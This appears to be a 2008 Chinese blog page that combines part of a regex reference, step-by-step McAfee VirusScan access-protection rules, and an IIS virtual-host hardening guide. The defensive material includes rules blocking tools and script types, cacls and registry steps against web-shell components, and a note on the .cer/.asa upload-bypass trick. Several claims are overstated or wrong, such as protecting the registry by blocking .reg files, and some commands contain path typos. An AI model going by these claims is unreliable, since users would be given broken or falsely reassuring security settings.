正向预查，在任何匹配 pattern 的字符串开始处匹配查找字符串。这是一个非获取匹配，也就是说，该匹配不需要获取供以后使用。例如， 'Windows (?=95|98|NT|2000)' 能匹配 "Windows 2000" 中的 "Windows" ，但不能匹配 "Windows 3.1" 中的 "Windows"。预查不消耗字符，也就是说，在一个匹配发生后，在最后一次匹配之后立即开始下一次匹配的搜索，而不是从包含预查的字符之后开始。
(?!pattern)
负向预查，在任何不匹配Negative lookahead matches the search string at any point where a string not matching pattern 的字符串开始处匹配查找字符串。这是一个非获取匹配，也就是说，该匹配不需要获取供以后使用。例如'Windows (?!95|98|NT|2000)' 能匹配 "Windows 3.1" 中的 "Windows"，但不能匹配 "Windows 2000" 中的 "Windows"。预查不消耗字符，也就是说，在一个匹配发生后，在最后一次匹配之后立即开始下一次匹配的搜索，而不是从包含预查的字符之后开始
x|y 
匹配 x 或 y。例如，'z|food' 能匹配 "z" 或 "food"。'(z|f)ood' 则匹配 "zood" 或 "food"。
[xyz]
字符集合。匹配所包含的任意一个字符。例如， '[abc]' 可以匹配 "plain" 中的 'a'。
[^xyz]
负值字符集合。匹配未包含的任意字符。例如， '[^abc]' 可以匹配 "plain" 中的'p'。
[a-z]
字符范围。匹配指定范围内的任意字符。例如，'[a-z]' 可以匹配 'a' 到 'z' 范围内的任意小写字母字符。
[^a-z]
负值字符范围。匹配任何不在指定范围内的任意字符。例如，'[^a-z]' 可以匹配任何不在 'a' 到 'z' 范围内的任意字符。
\b
匹配一个单词边界，也就是指单词和空格间的位置。例如， 'er\b' 可以匹配"never" 中的 'er'，但不能匹配 "verb" 中的 'er'。
\B
匹配非单词边界。'er\B' 能匹配 "verb" 中的 'er'，但不能匹配 "never" 中的 'er'。
\cx
匹配由x指明的控制字符。例如， \cM 匹配一个 Control-M 或回车符。 x 的值必须为 A-Z 或 a-z 之一。否则，将 c 视为一个原义的 'c' 字符。
\d
匹配一个数字字符。等价于 [0-9]。
\D
匹配一个非数字字符。等价于 [^0-9]。
\f
匹配一个换页符。等价于 \x0c 和 \cL。
\n
匹配一个换行符。等价于 \x0a 和 \cJ。
\r
匹配一个回车符。等价于 \x0d 和 \cM。
\s
匹配任何空白字符，包括空格、制表符、换页符等等。等价于 [ \f\n\r\t\v]。
\S
匹配任何非空白字符。等价于 [^ \f\n\r\t\v]。
\t
匹配一个制表符。等价于 \x09 和 \cI。
\v
匹配一个垂直制表符。等价于 \x0b 和 \cK。
\w
匹配包括下划线的任何单词字符。等价于'[A-Za-z0-9_]'。
\W
匹配任何非单词字符。等价于 '[^A-Za-z0-9_]'。
\xn
匹配 n，其中 n 为十六进制转义值。十六进制转义值必须为确定的两个数字长。例如， '\x41' 匹配 "A"。'\x041' 则等价于 '\x04' & "1"。正则表达式中可以使用 ASCII 编码。.
\num
匹配 num，其中 num 是一个正整数。对所获取的匹配的引用。例如，'(.)' 匹配两个连续的相同字符。
\n
标识一个八进制转义值或一个后向引用。如果 \n 之前至少 n 个获取的子表达式，则 n 为后向引用。否则，如果 n 为八进制数字 (0-7)，则 n 为一个八进制转义值。
\nm
标识一个八进制转义值或一个后向引用。如果 \nm 之前至少有is preceded by at least nm 个获取得子表达式，则 nm 为后向引用。如果 \nm 之前至少有 n 个获取，则 n 为一个后跟文字 m 的后向引用。如果前面的条件都不满足，若  n 和 m 均为八进制数字 (0-7)，则 \nm 将匹配八进制转义值 nm。
\nml
如果 n 为八进制数字 (0-3)，且 m 和 l 均为八进制数字 (0-7)，则匹配八进制转义值 nml。
\un
匹配 n，其中 n 是一个用四个十六进制数字表示的 Unicode 字符。例如，\u00A9 匹配版权符号 (?)。

查看(7) 评论(0) 收藏分享管理

mcafee规则设置1

2008-05-07 03:24:48

让有些朋友能手动添加MCAFEE8.0!企业版的一些规则。

使用mcafee后，感觉它的监控真是没得说，的确不错的杀软，不过对于新手来说可能设置麻烦了点，但如果只用默认设置的话就安全性低了点，也许很多朋友都是导入现成的规则，本着DIY的想法，并且每个人都应该有他们自己独特的设置，所以与大家分享咖啡的规则设置。

许多人对咖啡不了解。先对咖啡略为介绍。

咖啡是国际上三大杀软之一，也是下载使用率最高的杀软。它是迄今为止监控最灵敏的杀软，也是监控最全面的杀软。

下面是咖啡官方对咖啡杀软的简介：

McAfee防毒软件，除了操作介面更新外，也将该公司的WebScanX功能合在一起，增加了许多新功能! 除了帮你侦测和清除病毒，它还有VShield自动监视系统，会常驻在System Tray，当你从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性，若文件内含病毒，便会立即警告，并作适当的处理，而且支持鼠标右键的快速选单功能，并可使用密码将个人的设定锁住让别人无法乱改你的设定。

本人强烈推荐 McAfee VirusScan 8.0i 中文企业版+Anti-Spyware

安装咖啡注意事项：

1、在安装时，时间选项里，请选择“永久”，不要选择预订一年之类。

2、第一次升级咖啡，会很慢，大约2~3小时才能完成。请耐心等待。以后病毒库升级会很快，一般1~3分钟搞定。目前咖啡1~3天升级一次。个别时，一天升级3次以上。

咖啡安装完成了，先对咖啡进行一些设置。

1、访问保护。双击访问保护，打开访问保护。出现端口阻挡，文件保护，报告，三个选项。

（1）、更改端口设置。默认端口阻挡全部勾选。

添加阻挡端口新规则。端口总共有65535个。好了，把1~65535端口全部进行设置。由于咖啡对端口的阻挡模式分为两种：阻止入站，阻止出站，这样，对1~65535端口进行设置，需要分为两组。一组阻止通过1~65535端口入站，一组阻止通过1~65535端口出站。为了方便设置和查看端口阻挡而影响的进程，可以这样进行设置。1~1000，每隔100个端口设置一个规则，并进行规则标号。1000~10000，每隔1000个端口设置一个规则，也进行规则标号。10000~65535设置成一个规则，同时进行标号。这样设置好了，可以连网进行测试，怎么样，不能上网吧？当然别人也进不来了。好了，打开咖啡日志，查看那些进程被阻止，阻止的具体规则是哪些。比如，咖啡日志标明，svchost.exe进程被新规则1阻止，好了，选中新规则1，点击“编辑”，弹出对话框，在已排除进程里，添加svchost.exe，好了。依次类推，将影响的进程添加进去。设置好了之后，可以上网了。这样进行端口设置，可以阻挡99%的端口。那些通过端口出入的木马几乎没戏了。

（2）、更改访问保护设置。勾选所有默认设置。一一打开编辑，查看每个规则设置情况，凡是能够选择“阻止并报告访问尝试”，一律选择。——默认规则里，许多都是警告模式，将它们更改（注：如果更改默认设置，请再三思量，否则出现意外情况，我不负责）。将远程对exe、ocx等文件保护规则合并。但凡远程操作，在创建文件、写入文件、执行文件、读取文件、删除文件前全部打勾。

（3）、更改咖啡日志路径。放在其他盘里。

2、有害程序策略。默认规则里，都没有勾选。将他们全部勾选。

3、给咖啡杀软设置密码。咖啡控制台——工具——用户界面选项——密码选项。选择使用密码保护下面所有项目。设置8位以上超强密码。在用咖啡设置一系列规则之后，可以锁定咖啡杀软界面。这样，别人不能再更改您对咖啡的设置了。

4、共享资源的保护。打开咖啡访问保护——文件保护——共享资源，将它设置成阻止并报告访问尝试。这样，共享资源就不能被别人共享了。

5、按访问扫描程序设置。常规——扫描——将引导区，关机时扫描软盘去掉。

其他设置，自己看着办吧。

上面是咖啡本身携带的一些规则。为了安全，可以进行更加严格的设置。

1、用咖啡杀软来防止3721、网络猪、中文邮、百度搜霸、一搜等流氓软件。

目前，3721、网络猪、中文邮、百度搜霸、一搜经常偷偷溜进您的电脑，而且难以卸载干净。用咖啡杀软可以阻止它们进入。

打开咖啡杀软访问保护，创建如下几个规则：

1、禁止在本地创建、写入、执行、读取3721任何内容；

2、禁止在本地创建、写入、执行、读取网络猪任何内容；

3、禁止在本地创建、写入、执行、读取中文邮任何内容；

4、禁止在本地创建、写入、执行、读取百度搜霸任何内容；

5、禁止在本地创建、写入、执行、读取一搜任何内容。

好了，3721、网络猪、中文邮、百度搜霸、一搜等流氓软件没有理由呆在您的电脑里了。

附上部分设置方法。比如，防止3721的方法：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止在本地创建、写入、执行、读取3721任何内容

阻挡对象：*

要阻挡的文件或文件名：**\3721*\**

要阻止的文件操作：在创建文件、写入文件、执行文件、读取文件前全部打勾

响应方式：阻止并报告访问尝试

偶安装不少软件都捆绑3721，当咖啡打开此规则时，3721只见到一个鬼影子——空的3721文件夹。

2、用咖啡杀软来防止未知木马病毒

我查了下相关资料，就目前来说，木马、病毒基本都是三种类型的，exe、dll、vxd类型。好了，只要我们创建如下三种保护机制：

1、禁止在本地任何地方创建、写入任何exe文件

2、禁止在本地任何地方创建、写入任何dll文件

3、禁止在本地任何地方创建、写入任何vxd文件

这样，现在出现的各种木马病毒是进不来的。当然，这条规则非常霸道，就是您更新咖啡病毒库，对其他软件进行升级，下载exe、dll、vxd类型文件，以及移动任何exe、dll、vxd类型文件也不可能了。所以，当您进行类似操作时，暂时取消此规则，等操作完成之后，再继续使用。

部分规则创建如下所示：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止在本地任何地方创建、写入任何exe文件

阻挡对象：*

要阻挡的文件或文件名：**\*.exe

要阻止的文件操作：在创建文件、写入文件前打勾

响应方式：阻止并报告访问尝试

其他的类似规则，参照设置即可。

3、阻挡肆意删除文件的行为

现在出现许多删除mp3格式的病毒。好了，为了杜绝此类事件发生，可以这样做。打开咖啡访问保护，创建如下规则：禁止删除本地任何mp3文件。好了，那些病毒想删除mp3是不可能的了。即便是您自己也删不掉mp3了！除非解禁！为了杜绝类似删除某些文件的病毒、木马，好了。我们再创建一条规则：禁止删除本地任何内容。好了，那些肆意删除各种文件的病毒、木马，根本起不了什么作用。当然，如果这条规则起作用，您自己也不可能删除任何东西了。当您自己需要删除某些内容，暂时取消这条规则，等删除操作完成了，再打开就是了。这条规则保护自己电脑不被别人删除任何东西非常管用哦。而且别人莫名其妙的，他根本不会想到是咖啡在阻止删除操作哦！

规则创建如下所示：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止删除本地任何mp3文件

阻挡对象：*

要阻挡的文件或文件名：**\*.mp3

要阻止的文件操作：在删除文件前打勾

响应方式：阻止并报告访问尝试

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止删除本地任何内容

阻挡对象：*

要阻挡的文件或文件名：**\*\**

要阻止的文件操作：在删除文件前打勾

响应方式：阻止并报告访问尝试

个人也可以使用类似方法保护任何一个文件不被删除。比如rm文件等。自己照猫画虎试试。

4、用咖啡杀软保护注册表。

目前许多木马、病毒都喜欢在注册表驻留。好了。我们用咖啡创建这样一条规则。禁止对本地注册表进行创建、写入活动。好了。除非您同意，否则，注册表是不会无缘无故的被修改的。包括安装软件在内，如果咖啡依然开启这条规则，哈哈，软件虽然安装完了，注册表里却没有写入什么东西。虽然不少软件需要写入注册表里才成，可注册表里没有被写入也可以用的哦——不信的可以实验下！当然，不写入注册表，软件功能上会打折扣，尤其是杀软、防火墙之类。我曾做过类似实验。不让反间谍软件写入注册表里，结果它只能查到间谍，却不能清除间谍（查到间谍数量与反间谍软件安装时是否写入注册表无关）。对比一下金山、瑞星的注册表监视功能，金山、瑞星简直差远了。他们对注册表的监视不但烦人，而且意义不是很大。比如，安装一个软件，点击阻止写入注册表，那您就一直点下去吧。十年也点不完。有什么意义？

规则创建如下所示：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止对本地注册表进行创建、写入活动

阻挡对象：*

要阻挡的文件或文件名：**\*.reg

要阻止的文件操作：在创建文件、写入文件前打勾

响应方式：阻止并报告访问尝试

5、用咖啡来保护主页。

通过咖啡杀软来防护浏览器主页被修改完全可以。这样不用在安装其他软件进行防护了。其他浏览器防护软件不但占用一定资源，而且效果不一定好。而咖啡防护效果相当理想。具体方法如下：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止在本地创建/修改hosts文件

阻挡对象：IEXPLORE.EXE，或者*

要阻挡的文件或文件名：**\etc*\**

要阻止的文件操作：在创建文件、写入文件、删除文件前打勾

响应方式：阻止并报告访问尝试

好了。恶意网站不能在更改您的主页了。

查看(19) 评论(0) 收藏分享管理
mcafee规则设置2

2008-05-07 03:12:10

6、阻止恶意脚本入侵。

打开咖啡杀软访问保护中文件保护规则，创建这样一些规则：

1、禁止在本地任何地方读取、执行、创建、写入任何js文件

2、禁止在本地任何地方读取、执行、创建、写入任何vbs文件

3、禁止在本地任何地方读取、执行、创建、写入任何htm文件

4、禁止在本地任何地方读取、执行、创建、写入任何html文件

好了，恶意网站通过脚本而入侵本机的恶意代码、木马基本滚蛋了。

部分规则创建如下所示：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止在本地任何地方读取、执行、创建、写入任何js文件

阻挡对象：*

要阻挡的文件或文件名：**\*.js

要阻止的文件操作：在读取文件、执行文件、创建文件、写入文件前打勾

响应方式：阻止并报告访问尝试

其他的类似规则，参照设置即可。

当然，这样有些严厉，可能防碍上网，可以将这些规则修改为阻止创建、写入即可。

7、用咖啡来防止插件入侵。

现在上网越来越不安全。恶意插件越来越多了。好了。我们用咖啡来对付他们。由于那些插件是绑架到Internet Explorer文件里的，好了，我们用咖啡把Internet Explorer文件保护起来。

规则创建如下所示：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止在Internet Explorer文件夹中进行创建写入活动

阻挡对象：*

要阻挡的文件或文件名：**\Internet Explorer*\**

要阻止的文件操作：在创建文件、写入文件前打勾

响应方式：阻止并报告访问尝试

好了，那些插件不能进来了。

8、防止黑客破坏活动。

目前，黑客越来越多，也越来越喜欢入侵个人主机。黑客入侵个人主机不外乎两个原因：

1、炼手。学习怎么入侵别人。

2、种植后门。控制他人。

好了。废话少说。黑客入侵，很难阻挡。那对于入侵的黑客破坏行为如何进行阻挡呢？看咖啡的手段。我们用咖啡建立这样的规则：禁止远程行为对本地任何文件/文件夹进行任何操作。这样，黑客即便入侵了您的主机，他所能做的还有什么呢？

具体规则设置如下：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止远程行为对本地任何文件/文件夹进行任何操作

阻挡对象：System:Remote

要阻挡的文件或文件名：**\*\**

要阻止的文件操作：在读取文件、执行文件、创建文件、写入文件、删除文件前打勾

响应方式：阻止并报告访问尝试

如果还不放心，可以将系统盘里每个根目录文件夹都创建一个规则。禁止黑客对他们进行任何操作。具体就不一一列举里。这样设置，除非黑客能破坏咖啡，或者黑客知道咖啡密码，更改咖啡设置，才能进行进一步破坏活动。如果黑客想破坏咖啡，决非易事。用过咖啡的人知道，咖啡不能被退出进程，只会持续工作。当然黑客可以通过卸载咖啡来破坏，问题是，黑客进行远程卸载，必定调用exe之类文件，而咖啡是不允许黑客远程对exe之类文件进行任何操作的。偶使用咖啡不久，曾被一个黑客入侵，那时还不懂得设置如此严厉的规则，只是打开咖啡默认的对exe、dll文件保护规则，那个黑客都没有干成什么。如果能建立这样严厉的规则，黑客所能做的事情将会非常非常少哦。

9、防止程序运行。

咖啡具有强大的阻止功能，几乎可以阻止任何一个程序运行。比如，tftp.exe这个程序，一般用户是用不上的。可以用咖啡来阻止他运行。注：咖啡默认规则里已经设置，就不列举了。这个功能非常有用。如果某天，不想运行某个程序，可以参照这个规则，将那个程序终止。或者，某天中了木马、病毒，又清除不掉，怎么办呢？这时咖啡这个功能就突显出来了。将那个木马、病毒程序用咖啡阻止起来即可。这样，那个木马不能运行也等于死悄悄了。

10、建立最严厉的规则。

在到黑客网站、破解基地、黄色网站去，往往难免中木马。虽然我不去那些网站，但为了那些常去黑客网站、破解基地、黄色网站的人的安全，特意为其创建如下规则。禁止在本地进行任何创建、写入、删除活动。这样，中招的几率将会是0。

具体规则设置如下：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止在本地进行任何创建、写入、删除活动

阻挡对象：*

要阻挡的文件或文件名：**\*\**

要阻止的文件操作：在创建文件、写入文件、删除文件前打勾

响应方式：阻止并报告访问尝试

由于这条规则非常严厉，建议只在黑客网站、破解基地、黄色网站浏览时开启。这条规则会产生大量日志，一分钟往往就有几百条详细日志，非常占用空间。所以，移动咖啡日志到其他盘非常重要。当然，这条规则，也适合那些对安全性非常高的人使用。

11、防止Cookies泄密个人隐私

某些网站或\和黑客，会利用Cookies窃取用户信息。好了。为了尽量杜绝此类事件，可以这样做。用咖啡建立Cookies保护机制。

具体规则设置如下：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止对Cookies文件进行某些操作

阻挡对象：*

要阻挡的文件或文件名：**\Cookies*\**

要阻止的文件操作：在读取文件、创建文件、写入文件前打勾

响应方式：阻止并报告访问尝试

好了。通过Cookies泄密的个人隐私得到咖啡的保护了。当然，这样设置在某些网站不合适宜。需要暂时取消这条规则。至于IE浏览器对Cookies的保护机制，不太好操作。用禁止，好多网站不能去。不禁止，又有危险。与咖啡相比，显然咖啡更加人性化。希望大家喜欢。

12、使用咖啡来防护个人隐私文件。

这是利用咖啡具有强大的文件保护性能来实现的。许多人喜欢使用某些加密软件对个人文件进行加密，起到防护作用。如果您使用咖啡，那完全可以利用咖啡来实现这个功能。而且防护效果非常理想。他人如果对咖啡不是非常熟悉，根本不会想到是一个杀软来保护的。而且，咖啡防护文件，在他人读取、打开文件时，根本不提密码，也不提咖啡，只是提示：请确认磁盘没有写保护之类。对于一般人来说，还以为文件损毁了而打不开哈。哈哈。是否有些意思？

下面简单介绍一下，如何实现这个功能。首先，请将您所有需要保护的个人文件都放在某个根目录里，比如，起名为，流星雨。然后将这个文件保护起来即可。

具体规则设置如下：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止对流星雨文件/文件夹进行任何操作

阻挡对象：*

要阻挡的文件或文件名：**\流星雨*\**

要阻止的文件操作：在读取文件、执行文件、创建文件、写入文件、删除文件前打勾

响应方式：阻止并报告访问尝试

如果，您起其他文件名，参照设置即可。

好了，这样，在咖啡防护下，任何人都不能打开、删除这个文件了。只有当您暂时取消咖啡这条规则，才可以打开。

另外，别忘记需要先给咖啡设置8位数以上超强密码哦。在防护期间，将咖啡界面锁起来即可。

当然，个人来说，不会有什么绝对机密文件。无非是不想让他人看一些东东而已。所以，咖啡这个功能还是不错的哦。希望大家喜欢。

13、使用咖啡来安全的保护共享资源

这是完全可以的。

许多个人喜欢将自己的某些资源放在网络上与人共享，但是在共享同时，也必然存在不安全因素。为了最大限度保护个人安全，咖啡可以担当此重任。

咖啡具有强大的保护规则，完全可以做到这点。下面简单介绍一下，如何实现安全共享资源。现在假定硬盘是四个分区：C、D、E、F，系统盘是C盘。您想共享您的E盘资源。那么，您可以这样做。使用咖啡杀软建立这样几条规则：禁止远程行为对C盘进行任何操作；禁止远程行为对D盘进行任何操作；禁止远程行为在E盘进行创建/写入/删除操作；禁止远程行为对F盘进行任何操作。具体规则设置如下：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止远程行为对C盘进行任何操作

阻挡对象：System:Remote

要阻挡的文件或文件名：C:\*\**

要阻止的文件操作：在读取文件、执行文件、创建文件、写入文件、删除文件前打勾

响应方式：阻止并报告访问尝试

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止远程行为对D盘进行任何操作

阻挡对象：System:Remote

要阻挡的文件或文件名：D:\*\**

要阻止的文件操作：在读取文件、执行文件、创建文件、写入文件、删除文件前打勾

响应方式：阻止并报告访问尝试

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止远程行为在E盘进行创建/写入/删除操作

禁止远程行为对E盘进行任何操作

阻挡对象：System:Remote

要阻挡的文件或文件名：E:\*\**

要阻止的文件操作：在创建文件、写入文件、删除文件前打勾

响应方式：阻止并报告访问尝试

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止远程行为对F盘进行任何操作

阻挡对象：System:Remote

要阻挡的文件或文件名：F:\*\**

要阻止的文件操作：在读取文件、执行文件、创建文件、写入文件、删除文件前打勾

响应方式：阻止并报告访问尝试

将上面规则进行设置之后，还需要用咖啡来保持现有共享资源。再打开咖啡控制台------访问保护------文件夹保护------共享资源，勾选保持共享资源的现有访问权限。再对咖啡设置15位数以上超强密码，并锁定咖啡界面。好了。利用咖啡来保护您的安全设置好了。如果您想共享U盘，也可以参照设置。

这些规则设置，也适合不少网站。不过需要稍微修改一下，才能更好的发挥作用。

14、限制计算机管理工具中重要管理工具的修改操作

计算机管理工具中有许多重要工具，比如，本地安全策略、分布式文件系统、服务、计算机管理、组策略等等。这些操作在修改完成之后，一般不会轻易更改。为防止他人更改这些设置，可以将他们禁用。禁用的方法很多。这里主要谈谈，通过咖啡杀软来如何实现这个功能。由于本地安全策略、分布式文件系统、服务、计算机管理、路由和远程访问、事件查看器、性能、远程桌面、证书颁发机构、终端服务配置、组件服务、组策略等等都通过调用mmc.exe来进行操作的，所以可以利用这个共同点，来实现对他们的禁用。规则设置如下：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：限制计算机管理工具中重要管理工具的修改操作

阻挡对象：*

要阻挡的文件或文件名：**\mmc.exe

要阻止的文件操作：在读取文件、执行文件、创建文件、写入文件前打勾

响应方式：阻止并报告访问尝试

通过这个设置，可以将Microsoft .NET Framework配置、本地安全策略、分布式文件系统、服务、计算机管理、路由和远程访问、事件查看器、性能、远程桌面、证书颁发机构、终端服务配置、组件服务、组策略、设备管理器、控制台等几十个重要工具，保护起来，拒绝他人进行修改操作。当咖啡这条规则启用时，对这些管理工具进行修改操作时，会被提示没有权限进行操作（即便您使用Administrators登陆，也一样没有权限进行修改）。若当您进行类似操作时，请打开咖啡，暂时取消这条规则即可。当然，给咖啡设置密码是必不可少的哦。

15、封锁QQ等聊天软件

封锁QQ是让网络管理员、公司老板（既要自己可以使用，又要不让他人使用QQ）头疼的工作，以往我们还可以通过封锁UDP的4000等端口来实现，不过自从TENCENT开辟了QQ的TCP/IP协议登录功能，封杀QQ变得更加困难。只要能上网，能够使用浏览器浏览网页就能上QQ。QQ使网络管理、公司老板变得更加烦琐。如果您使用咖啡企业版，那您可以用咖啡来彻底封杀QQ了。方法很简单，用咖啡来阻止QQ用行即可。具体规则设置如下：

咖啡控制台------访问保护------文件夹保护-----添加

规则名称：禁止QQ运行

阻挡对象：*

要阻挡的文件或文件名：**\QQ.exe

要阻止的文件操作：在读取文件、执行文件、创建文件、写入文件前打勾

响应方式：阻止并报告访问尝试

上面规则设置好了，然后，再给咖啡设置10位以上超强密码，并锁定咖啡，好了，QQ在您的主机上不能被运行了。当他人想要运行QQ时，系统将提示：您没有权限运行QQ！除非咖啡解禁！如果您不想他人在您的主机上安装QQ，这个规则同样可以使用。此外，如果您想封杀其他聊天软件，参照封杀QQ的设置即可。这个规则，希望大家喜欢。个人家庭，尤其家长也适合的。

查看(30) 评论(0) 收藏分享管理
虚拟主机安全配置--关键2

2008-05-07 00:32:33

1、禁止guests用户执行com.exe：
　　我们可以通过以下命令取消guests执行com.exe的权限

　　cacls C:\WINNT\system3\Cmd.exe /e /d guests。

　　2、禁用Wscript.Shell组件：

　　Wscript.Shell可以调用系统内核运行DOS基本命令。可以通过修改注册表，将此组件改名，来防止此类木马的危害。 HKEY_CLASSES_ROOT\Wscript.Shell\ 及HKEY_CLASSES_ROOT\Wscript.Shell.1\改名为其它的名字。将两项clsid的值也改一下 HKEY_CLASSES_ROOT\Wscript.Shell\CLSID\项目的值和HKEY_CLASSES_ROOT\ Wscript.Shell.1\CLSID\项目的值，也可以将其删除。

　　3、禁用Shell.Application组件

　　Shell.Application也可以调用系统内核运行DOS基本命令。可以通过修改注册表，将此组件改名，来防止此类木马的危害。 HKEY_CLASSES_ROOT\Shell.Application\ 及HKEY_CLASSES_ROOT\Shell.Application.1\ 改名为其它的名字。将HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值 HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值更改或删除。同时，禁止Guest用户使用 shell32.dll来防止调用此组件。使用命令：cacls C:\WINNT\system32\shell32.dll /e /d guests

　　4、FileSystemObject组件

　　FileSystemObject可以对文件进行常规操作可以通过修改注册表，将此组件改名，来防止此类木马的危害。对应注册表项为HKEY_CLASSES_ROOT\ scripting.FileSystemObject\。可以禁止guests用户使用或直接将其删除。考虑到很多的上传都会使用到这个组件，为了方便，这里不建议更改或删除。

　　5、禁止telnet登陆

　　在C:\WINNT\system32目录下有个login.cmd文件，将其用记事本打开，在文件末尾另取一行，加入exit保存。这样用户在登陆telnet时，便会立即自动退出。

　　注：以上修改注册表操作均需要重新启动WEB服务后才会生效。

　　六、端口设置

　　端口窗体底端就是门，这个比喻非常形象。如果我们服务器的所有端口都开放的话，那就意味着黑客有好多门可以进行入侵。所以我个人觉得，关闭未使用的端口是一件重要的事情。在控制面板――网络与拨号连接――本地连接――属性――Internet协议(TCP/IP)属性，点击高级，进入高级TCP/IP设置，选择选项，在可选的设置中选择TCP/IP筛选，启用TCP/IP筛选。添加需要的端口，如21、80等，关闭其余的所有未使用的端口。

　　七、关闭文件共享

　　系统默认是启用了文件共享功能的。我们应给予取消。在控制面板――网络和拨号连接――本地连接――属性，在常规选项种，取消Microsoft 网络文件和打印共享。服务最少原则是保障安全的一项重要原则。非必要的服务应该给予关闭。系统服务可以在控制面板――管理工具――服务中进行设定。

　　八、关闭非必要服务

　　类似telnet服务、远程注册表操作等服务应给予禁用。同时尽可能安装最少的软件。这可以避免一些由软件漏洞带来的安全问题。有些网管在服务器上安装QQ，利用服务器挂QQ，这种做法是极度错误的。

　　九、关注安全动态及时更新漏洞补丁

　　更新漏洞补丁对于一个网络管理员来说是非常重要的。更新补丁，可以进一步保证系统的安全。

查看(16) 评论(0) 收藏分享管理

虚拟主机安全配置--关键1

2008-05-07 00:30:27

注入漏洞、上传漏洞、弱口令漏洞等问题随处可见。跨站攻击，远程控制等等是再老套不过了的话题。有些虚拟主机管理员不知是为了方便还是不熟悉配置，干脆就将所有的网站都放在同一个目录中，然后将上级目录设置为站点根目录。有些呢，则将所有的站点的目录都设置为可执行、可写入、可修改。有些则为了方便，在服务器上挂起了QQ，也装上了BT。更有甚者，竟然把Internet来宾帐号加入到Administrators组中!汗……!普通的用户将自己的密码设置为生日之类的6位纯数字，这种情况还可以原谅，毕竟他们大部分都不是专门搞网络研究的，中国国民的安全意识提高还需要一段时间嘛，但如果是网络管理员也这样，那就怎么也有点让人想不通了。网络安全问题日益突出，最近不又有人声称“万网：我进来玩过两次了!”一句话，目前很大部分的网站安全状况让人担忧!

　　这里就我个人过去的经历和大家一同来探讨有关安全虚拟主机配置的问题。以下以建立一个站点cert.ecjtu.jx.cn为例，跟大家共同探讨虚拟主机配置问题。

　　一、建立Windows用户

　　为每个网站单独设置windows用户帐号cert，删除帐号的User组，将cert加入Guest用户组。将用户不能更改密码，密码永不过期两个选项选上。

　　二、设置文件夹权限

　　1、设置非站点相关目录权限

　　Windows安装好后，很多目录和文件默认是everyone可以浏览、查看、运行甚至是可以修改的。这给服务器安全带来极大的隐患。这里就我个人的一些经验提一些在入侵中较常用的目录。

C：\;D：\;……
　　C:\perl
　　C:\temp\
　　C:\Mysql\
　　c:\php\
　　C:\autorun.inf
　　C:\Documents and setting\
　　C:\Documents and Settings\All Users\「开始」菜单\程序\
　　C:\Documents and Settings\All Users\「开始」菜单\程序\启动
　　C:\Documents and Settings\All Users\Documents\
　　C:\Documents and Settings\All Users\Application Data\Symantec\
　　C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere
　　C:\WINNT\system32\config\
　　C:\winnt\system32\inetsrv\data\
　　C:\WINDOWS\system32\inetsrv\data\
　　C:\Program Files\
　　C:\Program Files\Serv-U\
　　c:\Program Files\KV2004\
　　c:\Program Files\Rising\RAV
　　C:\Program Files\RealServer\
　　C:\Program Files\Microsoft SQL server\
　　C:\Program Files\Java Web Start\

　　以上这些目录或文件的权限应该作适当的限制。如取消Guests用户的查看、修改和执行等权限。由于篇幅关系，这里仅简单提及。

　　2、设置站点相关目录权限：

　　A、设置站点根目录权限：将刚刚建立的用户cert给对应站点文件夹，假设为D：\cert设置相应的权限：Adiministrators组为完全控制;cert有读取及运行、列出文件夹目录、读取，取消其它所有权限。

　　B、设置可更新文件权限：经过第1步站点根目录文件夹权限的设置后，Guest用户已经没有修改站点文件夹中任何内容的权限了。这显然对于一个有更新的站点是不够的。这时就需要对单独的需更新的文件进行权限设置。当然这个可能对虚拟主机提供商来说有些不方便。客户的站点的需更新的文件内容之类的可能都不一样。这时，可以规定某个文件夹可写、可改。如有些虚拟主机提供商就规定，站点根目录中uploads为web可上传文件夹，data或者 database为数据库文件夹。这样虚拟主机服务商就可以为客户定制这两个文件夹的权限。当然也可以像有些做的比较好的虚拟主机提供商一样，给客户做一个程序，让客户自己设定。可能要做到这样，服务商又得花不小的钱财和人力哦。

　　基本的配置应该大家都会，这里就提几个特殊之处或需要注意的地方。

　　1、主目录权限设置：这里可以设置读取就行了。写入、目录浏览等都可以不要，最关键的就是目录浏览了。除非特殊情况，否则应该关闭，不然将会暴露很多重要的信息。这将为黑客入侵带来方便。其余保留默认就可以了。

　　2、应用程序配置：在站点属性中，主目录这一项中还有一个配置选项，点击进入。在应用程序映射选项中可以看到，默认有许多应用程序映射。将需要的保留，不需要的全部都删除。在入侵过程中，很多程序可能限制了asp，php等文件上传，但并不对cer，asa等文件进行限制，如果未将对应的应用程序映射删除，则可以将asp的后缀名改为cer或者asa后进行上传，木马将可以正常被解析。这也往往被管理员忽视。另外添加一个应用程序扩展名映射，可执行文件可以任意选择，后缀名为.mdb。这是为了防止后缀名为mdb的用户数据库被下载。

　　3、目录安全性设置：在站点属性中选择目录安全性，点击匿名访问和验证控制，选择允许匿名访问，点击编辑。如下图所示。删除默认用户，浏览选择对应于前面为cert网站设定的用户，并输入密码。可以选中允许IIS控制密码。这样设定的目的是为了防止一些像站长助手、海洋等木马的跨目录跨站点浏览，可以有效阻止这类的跨目录跨站入侵。

